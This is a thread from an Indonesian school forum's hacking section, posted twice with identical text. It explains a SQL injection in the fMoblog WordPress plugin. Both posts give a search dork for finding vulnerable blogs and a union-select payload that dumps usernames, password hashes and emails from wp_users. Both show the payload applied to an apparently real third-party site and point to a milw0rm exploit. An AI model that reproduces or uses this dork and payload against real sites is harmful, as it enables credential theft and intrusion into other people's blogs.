Forum Anak-anak SMA 2 Kendari
Kami Rasa Anda Belum Login atau Terdaftar!!
Silahkan klik Login untuk Masuk Forum atau Klik Pendaftaran Untuk Registrasi.

Join the forum, it's quick and easy

Forum Anak-anak SMA 2 Kendari
Kami Rasa Anda Belum Login atau Terdaftar!!
Silahkan klik Login untuk Masuk Forum atau Klik Pendaftaran Untuk Registrasi.
Forum Anak-anak SMA 2 Kendari
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Forum Anak-anak SMA 2 Kendari

Forum Anak-anak SMA 2 Kendari


You are not connected. Please login or register

Forum Anak-anak SMA 2 Kendari » Pembahasan Umum » Komputer Security » Hacking » Khusus Pengguna Plugin fMoblog di Wordpress

Khusus Pengguna Plugin fMoblog di Wordpress

2 posters

Go down  Message [Halaman 1 dari 1]

adhe

adhe
Senior
Senior

Lagi ngga ada kerjaan, sembari bersih bersih file, kebetulan awal bulan besok saya udah mau hengkang dari kerjaan saat ini, akhirnya iseng deh baca baca info terbaru di luar sana, dan ada satu topik yang bikin saya betah untuk baca baca sekalian iseng ngelakuin penetration test Very Happy [ maaf isitlah penetration test juga baru dengar dari suhu C4turla, karena memang beliau adalah suhu di bidang ini, ada rasa enggan juga mau bahas topik ginian, karena ilmu saya sangatlah jauh bila dibandingkan dengan para master semua al [ suhu c4turla dan suhu ariefkeke ], namun karena saya liat banyak di antara kita memiliki blog di wordpress jadi tak ada salahnyalah berbagi informasi.

oh iya perlu di catat bahwa vulnerability ini bukan saya yg temukan karena seperti yg sabilang di atas, pengetahuan saya belum seberapa apalagi kalo mau disandingkan dengan kemampuan otak yang rada telmi Very Happy Very Happy

wiihh kenapa jadi curhat di Question

ya sudah langsung saja palena kalu begitu !!

fMoblog merupakan salah satu plugin yang dibuat oleh V.J.Catkick. versi yang teredia saat ini adalah versi 0.1.2 dengan update terakhir tanggal 6 februari 2009, dan bagi yang mau mengintegrasikan kedalam WP nya, maka minimal versi 2.5 yang da support. silahkan buka situsnya kalo mau tau lebih banyak tentang widget ini http://wordpress.org/extend/plugins/moblog/.

Bagi para blogger mania yang kebetulan pake wordpress dan juga memanfaatkan widget ini, maka berhari hatilah karena ternyata widget ini punya kelemahan sehingga bisa di lakukan sql injection [ tentang sql injection jangan tanya saya ya Very Happy ]

Penasaran bagaimana caranya ? inimi dia caranya kasian

keyword : "Gallery powered by fMoblog"
Jurusnya ini : alamat situs/?halaman yang ada celahnya&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

contoh :
http://sim01.com/word/?page_id=16

setelah di kasih doti menjadi

http://sim01.com/word/?page_id=16&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

ini capturenya :


Khusus Pengguna Plugin fMoblog di Wordpress Wordpress


sumber bacaan : http://www.milw0rm.com/


Nb, codenya ada yg ke potong, silahkan baca baca disini untuk lebih lengkapnya :

http://www.milw0rm.com/exploits/8229

http://www.adhewoelan.blogspot.com

NANDA_SMADAKENDARI

NANDA_SMADAKENDARI
Newbie
Newbie

Lagi ngga ada kerjaan, sembari bersih bersih file, kebetulan awal bulan besok saya udah mau hengkang dari kerjaan saat ini, akhirnya iseng deh baca baca info terbaru di luar sana, dan ada satu topik yang bikin saya betah untuk baca baca sekalian iseng ngelakuin penetration test Very Happy [ maaf isitlah penetration test juga baru dengar dari suhu C4turla, karena memang beliau adalah suhu di bidang ini, ada rasa enggan juga mau bahas topik ginian, karena ilmu saya sangatlah jauh bila dibandingkan dengan para master semua al [ suhu c4turla dan suhu ariefkeke ], namun karena saya liat banyak di antara kita memiliki blog di wordpress jadi tak ada salahnyalah berbagi informasi.

oh iya perlu di catat bahwa vulnerability ini bukan saya yg temukan karena seperti yg sabilang di atas, pengetahuan saya belum seberapa apalagi kalo mau disandingkan dengan kemampuan otak yang rada telmi Very Happy Very Happy

wiihh kenapa jadi curhat di Question

ya sudah langsung saja palena kalu begitu !!

fMoblog merupakan salah satu plugin yang dibuat oleh V.J.Catkick. versi yang teredia saat ini adalah versi 0.1.2 dengan update terakhir tanggal 6 februari 2009, dan bagi yang mau mengintegrasikan kedalam WP nya, maka minimal versi 2.5 yang da support. silahkan buka situsnya kalo mau tau lebih banyak tentang widget ini http://wordpress.org/extend/plugins/moblog/.

Bagi para blogger mania yang kebetulan pake wordpress dan juga memanfaatkan widget ini, maka berhari hatilah karena ternyata widget ini punya kelemahan sehingga bisa di lakukan sql injection [ tentang sql injection jangan tanya saya ya Very Happy ]

Penasaran bagaimana caranya ? inimi dia caranya kasian

keyword : "Gallery powered by fMoblog"
Jurusnya ini : alamat situs/?halaman yang ada celahnya&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

contoh :
http://sim01.com/word/?page_id=16

setelah di kasih doti menjadi

http://sim01.com/word/?page_id=16&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

ini capturenya :




sumber bacaan : http://www.milw0rm.com/


Nb, codenya ada yg ke potong, silahkan baca baca disini untuk lebih lengkapnya :

http://www.cliquerskendari.blospot.com

Kembali Ke Atas  Message [Halaman 1 dari 1]

Forum Anak-anak SMA 2 Kendari » Pembahasan Umum » Komputer Security » Hacking » Khusus Pengguna Plugin fMoblog di Wordpress

Permissions in this forum:
Anda tidak dapat menjawab topik